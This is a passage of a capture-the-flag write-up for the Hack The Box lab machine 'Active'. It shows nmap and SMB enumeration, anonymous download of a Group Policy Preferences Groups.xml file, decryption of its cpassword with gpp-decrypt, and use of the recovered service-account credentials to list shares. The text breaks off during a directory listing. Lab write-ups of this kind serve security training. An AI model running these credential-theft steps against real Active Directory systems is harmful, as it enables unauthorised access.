This machine appears to be vulnerable to the devastating Zerologon, but this write-up will going over the Group Policy / Ticket Granting Service vulnerability.
Run nmap to see what's open. The name of the machine should make what we're looking for obvious.
$ nmap -vvv -sC -sV -oA nmap/active.nmap 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 20:16 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Initiating Ping Scan at 20:16
Scanning 10.10.10.100 [4 ports]
Completed Ping Scan at 20:16, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:16
Completed Parallel DNS resolution of 1 host. at 20:16, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:16
Scanning 10.10.10.100 [1000 ports]
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Completed SYN Stealth Scan at 20:18, 143.85s elapsed (1000 total ports)
Initiating Service scan at 20:18
Scanning 18 services on 10.10.10.100
Completed Service scan at 20:20, 62.61s elapsed (18 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:20
Completed NSE at 20:20, 9.47s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:20
Completed NSE at 20:20, 5.36s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:20
Completed NSE at 20:20, 0.00s elapsed
Nmap scan report for 10.10.10.100
Host is up, received echo-reply ttl 127 (0.086s latency).
Scanned at 2022-09-07 20:16:33 EDT for 221s
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-09-08 00:19:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-
First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-
First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
...or just get the ports:
$ nmap -T5 -Pn 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 14:14 EDT
Nmap scan report for active.htb (10.10.10.100)
Host is up (1.5s latency).
Not shown: 866 closed tcp ports (reset), 116 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 2.93 seconds
The PORTS/SERVICE/VERSION that let us know what it is and possibly what we need to do:
53/tcp domain Microsoft DNS 6.1.7601 windows server 2008 R2 SP1
88/tcp kerberos Microsoft Windows Kerberos (server time: 2018-11-25 16:56:31)
389/tcp ldap Microsoft Windows AD active.htb
445/tcp microsoft-ds - but no shares open
It does look like a domain controller with these ports: 53, 88, 389.
Edit the hosts file with vim or nano, if desired, to point the IP address to active.htb as an alternative to using the IP address:
vim /etc/hosts
10.10.10.100 active.htb
nano /etc/hosts
10.10.10.100 active.htb
Run smbmap with host to see permissions.
$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Take a peak inside Replication.
$ smbmap -R Replication -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
Replication READ ONLY
.\Replication\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 active.htb
.\Replication\active.htb\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 DfsrPrivate
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Policies
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 scripts
.\Replication\active.htb\DfsrPrivate\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ConflictAndDeleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Deleted
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Installing
.\Replication\active.htb\Policies\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 23 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Group Policy
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 119 Sat Jul 21 06:38:11 2018 GPE.INI
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Preferences
fr--r--r-- 2788 Sat Jul 21 06:38:11 2018 Registry.pol
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Groups
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 22 Sat Jul 21 06:38:11 2018 GPT.INI
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 MACHINE
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 USER
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Microsoft
.\Replication\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 Windows NT
Get some Active Directory users.
$ GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 15:06:40 2022-09-26 18:24:04
Guest <never> <never>
krbtgt 2018-07-18 14:50:36 <never>
SVC_TGS 2018-07-18 16:14:38 2018-07-21 10:01:30
Connect to SMB:
$ smbclient -L \\\\10.10.10.100\\
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
There is a problem connecting. Try connecting directly to Replicant share:
$ smbclient -L \\\\10.10.10.100\\Replication
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
It's not connecting. Try with N (--no-pass) option.
$ smbclient -N \\\\10.10.10.100/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> prompt off
smb: \> recurse on
After disabling prompt and enabling recurse, list the files.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
\active.htb
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
\active.htb\DfsrPrivate
. DHS 0 Sat Jul 21 06:37:44 2018
.. DHS 0 Sat Jul 21 06:37:44 2018
ConflictAndDeleted D 0 Wed Jul 18 14:51:30 2018
Deleted D 0 Wed Jul 18 14:51:30 2018
Installing D 0 Wed Jul 18 14:51:30 2018
\active.htb\Policies
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018
\active.htb\scripts
. D 0 Wed Jul 18 14:48:57 2018
.. D 0 Wed Jul 18 14:48:57 2018
\active.htb\DfsrPrivate\ConflictAndDeleted
. D 0 Wed Jul 18 14:51:30 2018
.. D 0 Wed Jul 18 14:51:30 2018
\active.htb\DfsrPrivate\Deleted
. D 0 Wed Jul 18 14:51:30 2018
.. D 0 Wed Jul 18 14:51:30 2018
\active.htb\DfsrPrivate\Installing
. D 0 Wed Jul 18 14:51:30 2018
.. D 0 Wed Jul 18 14:51:30 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 23 Wed Jul 18 16:46:06 2018
Group Policy D 0 Sat Jul 21 06:37:44 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPT.INI A 22 Wed Jul 18 14:49:12 2018
MACHINE D 0 Sat Jul 21 06:37:44 2018
USER D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GPE.INI A 119 Wed Jul 18 16:46:06 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
Preferences D 0 Sat Jul 21 06:37:44 2018
Registry.pol A 2788 Wed Jul 18 14:53:45 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER
. D 0 Wed Jul 18 14:49:12 2018
.. D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Microsoft D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER
. D 0 Wed Jul 18 14:49:12 2018
.. D 0 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Windows NT D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Windows NT D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
SecEdit D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
SecEdit D 0 Sat Jul 21 06:37:44 2018
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GptTmpl.inf A 1098 Wed Jul 18 14:49:12 2018
\active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
GptTmpl.inf A 3722 Wed Jul 18 14:49:12 2018
5217023 blocks of size 4096. 284696 blocks available
There are some interesting files in here. Groups.xml might have some information inside. Download everything:
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F
340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC17
86C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/P
olicies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/
Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (5.6 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 53
3 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.6 KiloBytes/sec)
(average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.
inf (3.2 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.
inf (8.0 KiloBytes/sec) (average 3.1 KiloBytes/sec)
mget will show us where this file is located:
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
Or search for it with locate or find:
locate Groups.xml
find . -type f
Locate file and see what information it has.
$ cd active.htb/
$ find . -iname Groups.xml 2> /dev/null
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
It appears to have everything needed to gain access to the machine.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
SVC_TGS is the Ticket Granting Service account. Copy the name or userName and the cpassword:
name="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Crack the hash with gpp-decrypt:
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Password should be cracked so now we have the credentials.
active.htb\svc_tgs
GPP_PASSWORD
Now use smbmap to see the permissions of this account:
$ smbmap -u svc_tgs -d active.htb -p GPP_PASSWORD -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
READ ONLY for multiple shares. Check inside Users:
$ smbmap -u svc_tgs -d active.htb -p GPP_PASSWORD -H 10.10.10.100 -R Users
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
Users READ ONLY
.\Users\*
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 .
dw--w--w-- 0 Sat Jul 21 10:39:20 2018 ..
dr--r--r-- 0 Mon Jul 16 06:14:21 2018 Administrator
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 All Users
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Default
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Default User
fr--r--r-- 174 Mon Jul 16 17:01:17 2018 desktop.ini
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Public
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 SVC_TGS
.\Users\Default\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 AppData
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Cookies
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Desktop
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Documents
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Downloads
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Favorites
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Links
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Local Settings
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Documents
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 NetHood
fr--r--r-- 262144 Mon Jul 30 09:47:52 2018 NTUSER.DAT
fr--r--r-- 1024 Mon Jul 16 17:01:17 2018 NTUSER.DAT.LOG
fr--r--r-- 95232 Mon Jul 30 09:47:52 2018 NTUSER.DAT.LOG1
fr--r--r-- 0 Mon Jul 16 17:08:47 2018 NTUSER.DAT.LOG2
fr--r--r-- 65536 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.bl
f
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMCon
tainer00000000000000000001.regtrans-ms
fr--r--r-- 524288 Mon Jul 16 17:01:17 2018 NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMCon
tainer00000000000000000002.regtrans-ms
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 PrintHood
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Recent
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Saved Games
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 SendTo
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Templates
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Videos
.\Users\Default\AppData\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Local
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Roaming
.\Users\Default\AppData\Local\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Application Data
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temp
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 Temporary Internet Files
.\Users\Default\AppData\Local\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Local\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 GameExplorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 History
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Temporary Internet Files
.\Users\Default\AppData\Roaming\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Microsoft
.\Users\Default\AppData\Roaming\Microsoft\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Internet Explorer
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Windows
.\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Quick Launch
.\Users\Default\AppData\Roaming\Microsoft\Windows\*
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 .
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Cookies
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Network Shortcuts
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Printer Shortcuts
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Recent
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 SendTo
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 Start Menu
dr--r--r-- 0 Mon Jul 16 17:08:47 2018 Templates
.\Users\Default\Documents\*
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 .
dw--w--w-- 0 Mon Jul 16 17:08:47 2018 ..
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Music
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Pictures
dr--r--r-- 0 Mon Jul 16 17:08:56 2018 My Videos
.\Users\SVC_TGS\*
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 .
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 ..
dr--r--r-- 0 Sat Jul 21 11:14:20 2018 Contacts
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 Desktop
dr--r--r-- 0 Sat Jul 21 11:14:28 2018 Downloads
dr--r--r-- 0 Sat Jul 21 11:14:50 2018 Favorites
dr--r--r-- 0 Sat Jul 21 11:15:00 2018 Links
dr--r--r-- 0 Sat Jul 21 11:15:23 2018 My Documents
dr--r--r-- 0 Sat Jul 21 11:15:40 2018 My Music
dr--r--r-- 0 Sat Jul 21 11:15:50 2018 My Pictures
dr--r--r-- 0 Sat Jul 21 11:16:05 2018 My Videos
dr--r--r-- 0 Sat Jul 21 11:16:20 2018 Saved Games
dr--r--r-- 0 Sat Jul 21 11:16:32 2018 Searches
.\Users\SVC_TGS\Desktop\*
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 .
dr--r--r-- 0 Sat Jul 21 11:14:42 2018 ..
